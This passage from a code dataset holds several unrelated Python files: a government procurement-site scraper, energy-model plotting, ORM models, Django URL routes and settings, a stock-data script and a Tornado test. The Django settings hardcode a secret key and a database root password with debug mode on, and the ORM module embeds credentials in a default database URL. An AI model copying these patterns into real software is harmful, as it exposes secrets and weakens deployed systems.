Variant: Virginia 0', 'https://vendor.epro.cgipdc.com/loginEngine/index.jsp?guest_login=Public%20Access&Destination=x&openDoc=&', False, 10)\n    # ]\n    headless_opt = False\n    dab_input_list = \\\n    [AdvDAB('Advantage Site: Fulton Georgia 0', 'https://www.fultonvendorselfservice.co.fulton.ga.us/webapp/VSSPROD/AltSelfService', headless_opt),\n    AdvDAB('Advantage Site: Kentucky 0', 'https://emars.ky.gov/webapp/vssonline/AltSelfService', headless_opt),\n    AdvDAB('Advantage Site: Dallas 0', 'https://bids.dallascityhall.com/webapp/VSSPROD/AltSelfService', headless_opt),\n    AdvDAB('Advantage Site: Honolulu 0', 'https://www5.honolulu.gov/webapp/VSSPSRV1/AltSelfService', headless_opt),\n    AdvDAB('Advantage Site: West Virginia 0', 'https://prod-fin-vss.wvoasis.gov/webapp/prdvss11/AltSelfService', headless_opt),\n    AdvDAB('Advantage Site: Colorado 0', 'http://colorado.gov/vss', headless_opt),\n    AdvDAB('Advantage Site: Alabama 0', 'https://procurement.staars.alabama.gov/webapp/PRDVSS1X1/AltSelfService', headless_opt),\n    AdvDAB('Advantage Site: Alaska 0', 'https://iris-vss.alaska.gov/webapp/PRDVSS1X1/AltSelfService', headless_opt),\n    AdvDAB('Advantage Site: Iowa 0', 'https://vss.iowa.gov/webapp/VSS_ON/AltSelfService', headless_opt),\n    AdvDAB('Advantage Site: Palm Beach 0', 'https://pbcvssp.co.palm-beach.fl.us/webapp/vssp/AltSelfService', headless_opt),\n    AdvDAB('Advantage Site: Grand Rapids 0', 'https://cgiadvantage360.cgi.com/MICGR/AltSelfService', headless_opt),\n    AdvDAB('Advantage Site: Cincinnati 0', 'https://vss.cincinnati-oh.gov/webapp/VSSPROD/AltSelfService', headless_opt),\n    AdvDAB('Advantage Site: Maine 0', 'https://mevss.hostams.com/webapp/PRDVSS2X1/AltSelfService', headless_opt),\n    LaAdvDAB('Advantage Site Variant: Los Angeles 0', 'https://lacovss.lacounty.gov/webapp/VSSPSRV11/AltSelfService', headless_opt),\n    MiAdvDAB('Advantage Site Variant: Michigan 0', 'https://sigma.michigan.gov/webapp/PRDVSS2X1/AltSelfService', headless_opt, 30), \n    VaAdvDAB('Advantage Site Variant: Virginia 0', 'https://vendor.epro.cgipdc.com/loginEngine/index.jsp?guest_login=Public%20Access&Destination=x&openDoc=&', headless_opt, 20)\n    ]\n    sendReportByEmail = True\n    successes = []\n    failures = []\n    for data_acquisition_bot in dab_input_list:\n        name = data_acquisition_bot.name\n        uri = data_acquisition_bot.uri\n        result = data_acquisition_bot.dab()\n        if result:\n            successes.append((name,uri, data_acquisition_bot.debug_msgs))\n        else:\n            failures.append((name,uri, data_acquisition_bot.debug_msgs))\n    if sendReportByEmail:\n        report = \"%s SUCCESSES and %s FAILURES\\n\\n\" % (len(successes), len(failures))\n        success_report = \"%s SUCCESSES:\\n\" % len(successes)\n        for success in successes:\n            name, uri, debug_msgs = success\n            success_report += \"\\t%s%s\\n\" % (name, uri)\n            for msg in debug_msgs:\n                success_report += \"\\t\\t%s\\n\" %(msg)\n        failure_report = \"%s FAILURES:\\n\" % len(failures)\n        for failure in failures:\n            name, uri, debug_msgs = failure\n            failure_report += \"\\t%s%s\\n\" % (name, uri)\n            for msg in debug_msgs:\n                failure_report += \"\\t\\t%s\\n\" %(msg)\n        report = report + success_report + failure_report\n        email_report(report)\n    \nif __name__ == \"__main__\":\n    conduct()\n\n","sub_path":"Conductor.py","file_name":"Conductor.py","file_ext":"py","file_size_in_byte":6353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} {"seq_id":"76330934","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\nimport oemof.solph as solph\nimport matplotlib.pyplot as plt\nimport 
matplotlib.dates as mdates\nimport matplotlib.ticker as ticker\n\nimport os\nimport pandas as pd\nimport numpy as np\nfrom pandas.plotting import register_matplotlib_converters\n\n# register matplotlib converters which have been overwritten by pandas\nregister_matplotlib_converters()\n\n\n#################################################################\n\ndef make_directory(folder_name):\n existing_folders = next(os.walk('.'))[1]\n if folder_name in existing_folders:\n print('----------------------------------------------------------')\n print('Folder \"' + folder_name + '\" already exists in current directory.')\n print('----------------------------------------------------------')\n else:\n path = \"./\" + folder_name\n os.mkdir(path)\n print('----------------------------------------------------------')\n print('Created folder \"' + folder_name + '\" in current directory.')\n print('----------------------------------------------------------')\n\n\ndef adjust_yaxis(ax, ydif, v):\n \"\"\"shift axis ax by ydiff, maintaining point v at the same location\"\"\"\n inv = ax.transData.inverted()\n _, dy = inv.transform((0, 0)) - inv.transform((0, ydif))\n miny, maxy = ax.get_ylim()\n miny, maxy = miny - v, maxy - v\n if -miny > maxy or (-miny == maxy and dy > 0):\n nminy = miny\n nmaxy = miny * (maxy + dy) / (miny + dy)\n else:\n nmaxy = maxy\n nminy = maxy * (miny + dy) / (maxy + dy)\n ax.set_ylim(nminy + v, nmaxy + v)\n\n\ndef align_yaxis(ax1, v1, ax2, v2):\n \"\"\"adjust ax2 ylimit so that v2 in ax2 is aligned to v1 in ax1\"\"\"\n _, y1 = ax1.transData.transform((0, v1))\n _, y2 = ax2.transData.transform((0, v2))\n adjust_yaxis(ax2, (y1 - y2) / 2, v2)\n adjust_yaxis(ax1, (y2 - y1) / 2, v1)\n\n\ndef extract_results(model, approach, **kwargs):\n \"\"\" Extract data fro Pyomo Variables in DataFrames and plot for visualization.\n\n Extract the results from the toy model.\n A distinction for the different approaches has to be made since\n the demand response variables and the way they are handled vary.\n\n :param model: oemof.solph.models.Model\n The solved optimization model (including results)\n :param approach: str\n Must be one of [\"DIW\", \"IER\", \"DLR\", \"TUD\"]\n :return: df_model: pd.DataFrame\n A pd.DataFrame containing the concatenated and renamed results sequences\n \"\"\"\n\n # ########################### Get DataFrame out of Pyomo and rename series\n\n # TODO: Add results extraction and plotting for cases with more than one DSM unit\n # Determine amount of DSM units\n # introduce_second_dsm_unit = kwargs.get('introduce_second_dsm_unit', False)\n\n # Determine which generation results to exctract\n include_coal = kwargs.get('include_coal', True)\n include_gas = kwargs.get('include_gas', False)\n\n # Introduce shorcuts\n bus_elec_seqs = solph.views.node(model.es.results['main'], 'bus_elec')['sequences']\n dsm_seqs = solph.views.node(model.es.results['main'], 'demand_dsm')['sequences']\n\n # Generators coal\n if include_coal:\n df_coal_1 = bus_elec_seqs[\n (('pp_coal_1', 'bus_elec'), 'flow')].rename('coal1', inplace=True)\n else:\n df_coal_1 = pd.Series(index=bus_elec_seqs.index)\n\n if include_gas:\n df_gas_1 = bus_elec_seqs[\n (('pp_gas_1', 'bus_elec'), 'flow')].rename('gas1', inplace=True)\n else:\n df_gas_1 = pd.Series(index=bus_elec_seqs.index)\n\n # Generators RE\n df_wind = bus_elec_seqs[\n (('wind', 'bus_elec'), 'flow')].rename('wind', inplace=True)\n\n df_pv = bus_elec_seqs[\n (('pv', 'bus_elec'), 'flow')].rename('pv', inplace=True)\n\n # Shortage/Excess\n df_shortage = 
bus_elec_seqs[\n (('shortage_el', 'bus_elec'), 'flow')].rename('shortage', inplace=True)\n\n df_excess = bus_elec_seqs[\n (('bus_elec', 'excess_el'), 'flow')].rename('excess', inplace=True)\n\n # ---------------- Extract DSM results (all approaches) ---------------------\n # Parts of results extraction is dependent on kwargs (might be removed later)\n use_no_shed = kwargs.get('use_no_shed', False)\n\n # Demand after DSM\n df_demand_dsm = bus_elec_seqs[\n (('bus_elec', 'demand_dsm'), 'flow')].rename('demand_dsm',\n inplace=True)\n\n # Downwards shifts (shifting)\n df_dsmdo_shift = dsm_seqs.iloc[:, dsm_seqs.columns.str[1]\n == 'dsm_do_shift'].sum(\n axis=1).rename('dsm_do_shift', inplace=True)\n\n # Downwards shifts (shedding)\n if not (approach == \"DLR\" and use_no_shed):\n df_dsmdo_shed = dsm_seqs.iloc[:, dsm_seqs.columns.str[1]\n == 'dsm_do_shed'].sum(\n axis=1).rename('dsm_do_shed', inplace=True)\n else:\n df_dsmdo_shed = pd.Series(index=dsm_seqs.index)\n\n # Upwards shifts\n df_dsmup = dsm_seqs.iloc[:, dsm_seqs.columns.str[1]\n == 'dsm_up'].sum(\n axis=1).rename('dsm_up', inplace=True)\n\n # Print the sequences for the demand response unit in order to include\n # proper slicing\n # print(dsm_seqs.columns)\n\n df_dsm_add = None\n\n # Get additional DSM results dependent on approach considered\n if approach == \"TUD\":\n # DSM storage level\n df_dsmsl = dsm_seqs.iloc[:, dsm_seqs.columns.str[1]\n == 'dsm_sl'].sum(\n axis=1).rename('dsm_sl', inplace=True)\n\n df_dsm_add = df_dsmsl.copy()\n\n elif approach == \"DLR\":\n # Original shift values\n df_dsmdo_orig = df_dsmdo_shift.copy().rename('dsm_do_orig',\n inplace=True)\n df_dsmup_orig = df_dsmup.copy().rename('dsm_up_orig',\n inplace=True)\n\n # Balacing values\n df_dsmdo_bal = dsm_seqs.iloc[:, dsm_seqs.columns.str[1]\n == 'balance_dsm_do'].sum(\n axis=1).rename('balance_dsm_do', inplace=True)\n df_dsmup_bal = dsm_seqs.iloc[:, dsm_seqs.columns.str[1]\n == 'balance_dsm_up'].sum(\n axis=1).rename('balance_dsm_up', inplace=True)\n\n # DSM storage levels\n df_dsmsldo = dsm_seqs.iloc[:, dsm_seqs.columns.str[1]\n == 'dsm_do_level'].sum(\n axis=1).rename('dsm_sl_do', inplace=True)\n df_dsmslup = dsm_seqs.iloc[:, dsm_seqs.columns.str[1]\n == 'dsm_up_level'].sum(\n axis=1).rename('dsm_sl_up', inplace=True)\n\n df_dsmdo_shift = df_dsmdo_orig.add(df_dsmup_bal).rename('dsm_do_shift',\n inplace=True)\n df_dsmup = df_dsmup_orig.add(df_dsmdo_bal).rename('dsm_up',\n inplace=True)\n\n df_dsm_add = pd.concat([df_dsmdo_orig, df_dsmup_orig,\n df_dsmdo_bal, df_dsmup_bal,\n df_dsmsldo, df_dsmslup], axis=1)\n\n # Effective DSM shift (shifting only)\n df_dsm_tot = df_dsmdo_shift - df_dsmup\n df_dsm_tot.rename('dsm_tot', inplace=True)\n\n # DSM storage level\n df_dsm_acum = df_dsm_tot.cumsum()\n df_dsm_acum.rename('dsm_acum', inplace=True)\n\n # Original demand before DSM\n df_demand_el = [_ for _ in model.NODES.data() if str(_) == 'demand_dsm'][0].demand\n df_demand_el.rename('demand_el', inplace=True)\n\n # Capacity limit for upshift\n df_capup = [_ for _ in model.NODES.data() if str(_) == 'demand_dsm'][0].capacity_up\n df_capup.rename('cap_up', inplace=True)\n\n # Capacity limit for downshift\n df_capdo = [_ for _ in model.NODES.data() if str(_) == 'demand_dsm'][0].capacity_down\n df_capdo.rename('cap_do', inplace=True)\n\n # ####### Merge alld data into one DataFrame\n df_model = pd.concat([df_coal_1, df_gas_1, df_wind, df_pv, df_excess, df_shortage,\n df_demand_dsm, df_dsmdo_shift, df_dsmdo_shed, df_dsmup,\n df_dsm_tot, df_dsm_acum, df_demand_el,\n df_capup, 
df_capdo],\n axis=1)\n\n # Add additional dsm values for certain approaches\n if df_dsm_add is not None:\n df_model = pd.concat([df_model, df_dsm_add], axis=1, sort=False)\n\n return df_model\n\n\ndef plot_dsm(df_gesamt, directory, project, days, **kwargs):\n \"\"\" Create a plot of DSM activity \"\"\"\n figsize = kwargs.get('figsize', (15, 10))\n save = kwargs.get('save', False)\n approach = kwargs.get('approach', None)\n include_approach = kwargs.get('include_approach', False)\n include_generators = kwargs.get('include_generators', False)\n ax1_ylim = kwargs.get('ax1_ylim', [-10, 250])\n ax2_ylim = kwargs.get('ax2_ylim', [-110, 150])\n\n use_no_shed = kwargs.get('use_no_shed', False)\n\n # ############ DATA PREPARATION FOR FIGURE #############################\n\n # Create Figure\n for info, slice in df_gesamt.resample(str(days) + 'D'):\n\n # Generators from model\n # hierarchy for plot: wind, pv, coal, gas, shortage\n if include_generators:\n graph_wind = slice.wind.values\n graph_pv = graph_wind + slice.pv.values\n graph_coal = graph_pv + slice.coal1.values\n graph_gas = graph_coal + slice.gas1.values\n graph_shortage = graph_gas + slice.shortage.values\n\n #################\n # first axis\n # get_ipython().run_line_magic('matplotlib', 'notebook')\n fig, ax1 = plt.subplots(figsize=figsize)\n ax1.set_ylim(ax1_ylim)\n\n # x-Axis date format\n ax1.xaxis_date()\n ax1.xaxis.set_major_formatter(mdates.DateFormatter('%d.%m - %H h')) # ('%d.%m-%H h'))\n ax1.set_xlim(info - pd.Timedelta(1, 'h'), info + pd.Timedelta(days * 24 + 1, 'h'))\n plt.xticks(pd.date_range(start=info._date_repr, periods=days * 24, freq='H'), rotation=90)\n\n # Demands\n # ax1.plot(range(timesteps), dsm, label='demand_DSM', color='black')\n ax1.step(slice.index, slice.demand_el.values, where='post', label='Demand', linestyle='--', color='blue')\n ax1.step(slice.index, slice.demand_dsm.values, where='post', label='Demand after DSM', color='black')\n\n # DSM Capacity\n ax1.step(slice.index, slice.demand_el + slice.cap_up, where='post', label='DSM Capacity', color='red',\n linestyle='--')\n ax1.step(slice.index, slice.demand_el - slice.cap_do, where='post', color='red', linestyle='--')\n\n # Generators\n if include_generators:\n ax1.fill_between(slice.index, 0, graph_wind, step='post', label='Wind', facecolor='darkcyan', alpha=0.5)\n ax1.fill_between(slice.index, graph_wind, graph_pv, step='post', label='PV', facecolor='gold', alpha=0.5)\n ax1.fill_between(slice.index, graph_pv, graph_coal, step='post', label='Coal', facecolor='black', alpha=0.5)\n ax1.fill_between(slice.index, graph_coal, graph_gas, step='post', label='Gas', facecolor='brown', alpha=0.5)\n # ax1.fill_between(slice.index, slice.demand_dsm.values, graph_coal,\n # step='post',\n # label='Excess',\n # facecolor='firebrick',\n # hatch='/',\n # alpha=0.5)\n\n ax1.legend(bbox_to_anchor=(0., 1.1, 1., .102), loc=3, ncol=4, mode=\"expand\", borderaxespad=0.)\n\n # plt.xticks(range(0,timesteps,5))\n\n plt.grid()\n\n ###########################\n # Second axis\n ax2 = ax1.twinx()\n ax2.xaxis_date()\n ax2.xaxis.set_major_formatter(mdates.DateFormatter('%d.%m - %H h')) # ('%d.%m-%H h'))\n ax2.set_xlim(info - pd.Timedelta(1, 'h'), info + pd.Timedelta(days * 24 + 1, 'h'))\n plt.xticks(pd.date_range(start=info._date_repr, periods=days * 24, freq='H'), rotation=90)\n\n ax2.set_ylim(ax2_ylim)\n # align_yaxis(ax1, 100, ax2, 0)\n\n # DSM up/down\n\n # ax2.step(slice.index, slice.dsm_acum, where='post',\n # label='DSM acum', alpha=0.5, color='orange')\n\n 
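        #\n        # The align_yaxis helper defined above can pin a shared reference level on the twin\n        # axes; a small usage sketch with made-up limits:\n        #\n        #     fig2, ax_l = plt.subplots()\n        #     ax_r = ax_l.twinx()\n        #     ax_l.set_ylim(-10, 250)\n        #     ax_r.set_ylim(-110, 150)\n        #     align_yaxis(ax_l, 0, ax_r, 0)   # y=0 now sits at the same height on both axes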
ax2.fill_between(slice.index, 0, -slice.dsm_do_shift,\n step='post',\n label='DSM_down_shift',\n facecolor='red',\n # hatch='.',\n alpha=0.3)\n if not (approach == \"DLR\" and use_no_shed):\n ax2.fill_between(slice.index, -slice.dsm_do_shift,\n -(slice.dsm_do_shift + slice.dsm_do_shed),\n step='post',\n label='DSM_down_shed',\n facecolor='blue',\n # hatch='.',\n alpha=0.3)\n ax2.fill_between(slice.index, 0, slice.dsm_up,\n step='post',\n label='DSM_up',\n facecolor='green',\n # hatch='.',\n alpha=0.3)\n # ax2.fill_between(slice.index, 0, slice.dsm_acum,\n ax2.plot(slice.index, slice.dsm_acum,\n linestyle='none',\n markersize=8,\n marker=\"D\",\n color=\"dimgrey\",\n fillstyle='none',\n drawstyle=\"steps-post\",\n # step='post',\n label='DSM acum',\n # facecolor=None,\n # hatch='x',\n # alpha=0.0)\n )\n\n # Legend axis 2\n ax2.legend(bbox_to_anchor=(0., -0.3, 1., 0.102), loc=3, ncol=3, borderaxespad=0., mode=\"expand\")\n ax1.set_xlabel('Time t in h')\n ax1.set_ylabel('MW')\n ax2.set_ylabel('$\\Delta$ MW')\n\n if approach is not None:\n plt.title(approach)\n\n plt.show()\n\n if save:\n fig.set_tight_layout(True)\n name = 'Plot_' + project + '_' + info._date_repr + '.png'\n if include_approach:\n name = 'Plot_' + project + '_' + approach + '_' + info._date_repr + '.png'\n fig.savefig(directory + 'graphics/' + name)\n plt.close()\n print(name + ' saved.')\n","sub_path":"INREC_examples/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":14449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"279770345","text":"import os\nfrom peewee import PostgresqlDatabase, Model, PrimaryKeyField, CharField, IntegerField, ForeignKeyField, TextField, DeferredThroughModel, ManyToManyField\nfrom playhouse.db_url import connect\n\n'''\nDB_NAME = os.getenv('DB_NAME', 'isbn_metadata')\nDB_USER = os.getenv('DB_USER', 'super')\nDB_PASS = os.getenv('DB_PASS', '123')\nDB_HOST = os.getenv('DB_HOST', 'localhost')\nDB_PORT = os.getenv('DB_PORT', '')\n\ndatabase = PostgresqlDatabase(\n DB_NAME,\n user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n)\n'''\ndatabase_url = os.getenv('DATABASE_URL', 'postgresql://super:123@localhost:5432/isbn_metadata')\ndatabase = connect(database_url)\n\nclass BaseModel(Model):\n class Meta:\n database = database\n\n\nclass Author(BaseModel):\n id = PrimaryKeyField(null=False)\n name = CharField(max_length=255, unique=True)\n\n\nAuthorThroughDeferred = DeferredThroughModel()\n\n\nclass Book(BaseModel):\n id = PrimaryKeyField(null=False)\n google_book_id = CharField(max_length=12, unique=True)\n title = CharField(max_length=255)\n subtitle = CharField(max_length=255, null=True)\n description = TextField(null=True)\n published_date = CharField(max_length=45, null=True)\n isbn_10 = CharField(max_length=10, null=True, unique=True)\n isbn_13 = CharField(max_length=13, null=True, unique=True)\n publisher = CharField(max_length=255, null=True)\n page_count = CharField(max_length=45, null=True)\n print_type = CharField(max_length=45, null=True)\n language = CharField(max_length=45, null=True)\n main_category = CharField(max_length=255, null=True)\n authors = ManyToManyField(Author, backref='books',\n through_model=AuthorThroughDeferred)\n\n\nclass AuthorBook(BaseModel):\n author = ForeignKeyField(Author, backref='books_through')\n book = ForeignKeyField(Book, backref='authors_through')\n\n\nAuthorThroughDeferred.set_model(AuthorBook)\n\n\ndef create_tables():\n with database:\n database.drop_tables([Author, Book, 
AuthorBook])\n    database.create_tables([Author, Book, AuthorBook])\n","sub_path":"web/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"385159727","text":"import re\ndef seg_char(sent):\n    \"\"\"\n    Split a sentence into single characters without breaking up English words\n    \"\"\"\n    # First split out English words and the punctuation around them\n    pattern_char_1 = re.compile(r'([\\W])')\n    parts = pattern_char_1.split(sent)\n    parts = [p for p in parts if len(p.strip())>0]\n    # Then split the Chinese characters one by one\n    result = []\n    pattern = re.compile(r'([\\u4e00-\\u9fa5])')\n    for p in parts:\n        chars = pattern.split(p)\n        chars = [w for w in chars if len(w.strip())>0]\n        result += chars\n    return result\n\n\ns = \"啊今天是个good day啊!天气非常的nice,12sad 3123我想打110了\"\nprint(seg_char(s))\n","sub_path":"test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"605038556","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('parfum_db', '0020_parfum_type_parfum_type_description'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='perfumeingridientcategory',\n            name='keynote',\n            field=models.CharField(default=b'', max_length=200, verbose_name=b'\\xd0\\xb4\\xd0\\xbe\\xd0\\xbc\\xd0\\xb8\\xd0\\xbd\\xd0\\xb8\\xd1\\x80\\xd1\\x83\\xd1\\x8e\\xd1\\x89\\xd0\\xb0\\xd1\\x8f \\xd0\\xbd\\xd0\\xbe\\xd1\\x82\\xd0\\xb0', blank=True),\n        ),\n    ]\n","sub_path":"parfum_db/migrations/0021_perfumeingridientcategory_keynote.py","file_name":"0021_perfumeingridientcategory_keynote.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"166862995","text":"from django.conf.urls import url\r\nfrom . 
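What seg_char above yields for a small mixed input (the string is made up; the result follows from the two regex splits):
print(seg_char("hello世界ok 123"))
# ['hello', '世', '界', 'ok', '123'] -- English runs stay whole, Chinese splits per character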
import views\r\n\r\n\r\napp_name='user_functions'\r\nurlpatterns = [\r\n url(r'^$', views.landing, name='landing'),\r\n url(r'^login/$', views.login_view, name='login'),\r\n url(r'^logout/$', views.logout_view, name='logout'),\r\n url(r'^register/$', views.register, name='register'),\r\n url(r'^hub/$', views.hub, name='hub'),\r\n url(r'^settings/(?P\\d+)/$', views.settings, name='settings'),\r\n ]\r\n","sub_path":"user_functions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"466364683","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nDjango settings for srlab project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os, sys\nfrom django.contrib import messages\n\nBASE_DIR = os.path.dirname(__file__)\nsys.path.insert(0, os.path.join(BASE_DIR, 'libs'))\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '06^h73s*up*0i&_uf0z2h)7$7ad6w!2by(lk87x0v$40xh!6bn'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django_admin_bootstrapped.bootstrap3',\n 'django_admin_bootstrapped',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'bootstrap3',\n 'select_multiple_field',\n 'bootstrapform',\n 'datetimewidget',\n 'srlab_admin',\n)\n\nDAB_FIELD_RENDERER = 'django_admin_bootstrapped.renderers.BootstrapFieldRenderer'\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nADMINS = (\n ('Admin', 'enoquejoseneas@gmail.com'),\n)\n\nROOT_URLCONF = 'srlab.urls'\n\nWSGI_APPLICATION = 'srlab.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n # 'default': {\n # 'ENGINE': 'django.db.backends.sqlite3',\n # 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n # }\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'srlab',\n 'USER': 'root',\n 'PASSWORD': 'Toti131',\n 'HOST': 'localhost',\n 'PORT': '',\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'pt-br'\n\nTIME_ZONE = 'America/Sao_Paulo'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, \"static\"),\n '/var/www/srlab/static/',\n)\n\nSTATIC_URL = '/var/www/srlab/static/'\n\n# Put strings here, like \"/home/html/django_templates\"\n# Always use forward slashes, even on Windows.\n# 
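With app_name set as above, routes are addressed through the namespace. A shell sketch; note the settings pattern appears to have lost its named group to extraction, so (?P<pk>\d+) below is an assumed restoration:
from django.urls import reverse
reverse('user_functions:login')               # -> '/login/'
reverse('user_functions:settings', args=[7])  # -> '/settings/7/' once the group is restored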
Don't forget to use absolute paths, not relative paths.\nTEMPLATE_DIRS = (\n os.path.join(BASE_DIR, 'templates/'),\n)\n\n#django admin com boostrap\n#https://github.com/django-admin-bootstrapped/django-admin-bootstrapped\n#para usar bootstrap no frontend: http://www.tangowithdjango.com/book17/chapters/bootstrap.html\n#encontrei correção para o erro em:\n#https://colab.interlegis.leg.br/browser/django-admin-bootstrapped/django_admin_bootstrapped/templates/admin/includes/fieldset.html?rev=35a3e978c711d4d22047a19e2386a491edb5b4b6\n\nMESSAGE_TAGS = {\n messages.SUCCESS: 'alert-success success',\n messages.WARNING: 'alert-warning warning',\n messages.ERROR: 'alert-danger error'\n}\n\nEMAIL_HOST = 'localhost'\nEMAIL_PORT = 25\n# EMAIL_USE_TLS = False\n# EMAIL_HOST_USER = 'root' # username of one of my user on the first server\n# EMAIL_HOST_PASSWORD = 'Toti131'\n\n#DEFAULT_CONTENT_TYPE = 'application/xhtml+xml'\n\n# messages.success(request, \"My success message\")\n# messages.warning(request, \"My warning message\")\n# messages.error(request, \"My error message\")\n# ver o app instalado ao usar os forms no frontend\n# https://django-bootstrap-form.readthedocs.org/en/latest/","sub_path":"srlab/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"9832486","text":"#!/usr/bin/env python\r\n\r\nimport requests\r\nimport urllib2\r\nfrom bs4 import BeautifulSoup, SoupStrainer\r\nfrom historical_price import *\r\nfrom keystockdata import *\r\nfrom balance_sheet import *\r\nfrom income_statement import *\r\nfrom cashflow import *\r\n\r\ndef clear_screen():\r\n\tif os.name == 'nt':\r\n\t\tos.system(\"cls\")\r\n\telse:\r\n\t\tos.system(\"clear\")\r\n\t\t\r\n\r\ndef convert_to_number(cell):\r\n if cell == '-':\r\n return 0\r\n else:\r\n return cell\r\n\t\r\ndef getHTMLPage(baseURL):\r\n\tr = requests.get(baseURL)\r\n\tsoup = BeautifulSoup(r.text.encode('utf-8'), 'html.parser')\r\n\t\r\n\treturn soup\r\n\r\ndef logFile():\r\n\treturn\r\n\t\r\n\t\r\ndef main():\r\n\tcreateKeyStockDataCSV(\"PRESTAR\")\r\n\tcreateHistoricalPriceCSV(\"PRESTAR\", 180)\r\n\tcreateBalanceSheetCSV(\"PRESTAR\", \"annual\")\r\n\tcreateBalanceSheetCSV(\"PRESTAR\", \"quarter\")\r\n\tcreateIncomeStatementCSV(\"PRESTAR\", \"annual\")\r\n\tcreateIncomeStatementCSV(\"PRESTAR\", \"quarter\")\r\n\tcreateCashFlowCSV(\"PRESTAR\", \"annual\")\r\n\tcreateCashFlowCSV(\"PRESTAR\", \"quarter\")\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\r\nif __name__ == \"__main__\":\r\n main()\r\n\t\r\n","sub_path":"front_end/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"82662880","text":"import os\nfrom pathlib import Path\nfrom unittest.mock import Mock, patch\n\nfrom tornado.testing import AsyncHTTPTestCase\nfrom tornado.web import Application\n\nfrom mhs.builder.ebxml_ack_message_builder import EbXmlAckMessageBuilder\nfrom mhs.handler.async_response_handler import AsyncResponseHandler\nfrom mhs.parser.ebxml_message_parser import EbXmlRequestMessageParser\nfrom utilities.file_utilities import FileUtilities\nfrom utilities.message_utilities import MessageUtilities\nfrom utilities.xml_utilities import XmlUtilities\n\nMESSAGES_DIR = \"messages\"\nREQUEST_FILE = \"ebxml_request.msg\"\nEXPECTED_RESPONSE_FILE = \"ebxml_ack.xml\"\nFROM_PARTY_ID = \"FROM-PARTY-ID\"\nCONTENT_TYPE_HEADERS = {\"Content-Type\": 
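A sketch of how getHTMLPage above would be consumed; the URL is a placeholder:
soup = getHTMLPage("https://example.com")   # placeholder URL
for link in soup.find_all("a"):             # BeautifulSoup tree parsed from the response
    print(link.get("href"))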
'multipart/related; boundary=\"--=_MIME-Boundary\"'}\nREF_TO_MESSAGE_ID = \"B4D38C15-4981-4366-BDE9-8F56EDC4AB72\"\nEXPECTED_MESSAGE = ''\n\n\nclass TestAsyncResponseHandler(AsyncHTTPTestCase):\n \"\"\"A simple integration test for the async response endpoint.\"\"\"\n\n current_dir = os.path.dirname(os.path.abspath(__file__))\n message_dir = Path(current_dir) / MESSAGES_DIR\n\n def setUp(self):\n self.callbacks = {}\n super().setUp()\n\n def get_app(self):\n ack_builder = EbXmlAckMessageBuilder()\n message_parser = EbXmlRequestMessageParser()\n return Application([\n (r\".*\", AsyncResponseHandler,\n dict(ack_builder=ack_builder, message_parser=message_parser, callbacks=self.callbacks,\n party_id=FROM_PARTY_ID))\n ])\n\n @patch.object(MessageUtilities, \"get_timestamp\")\n @patch.object(MessageUtilities, \"get_uuid\")\n def test_post(self, mock_get_uuid, mock_get_timestamp):\n mock_get_uuid.return_value = \"5BB171D4-53B2-4986-90CF-428BE6D157F5\"\n 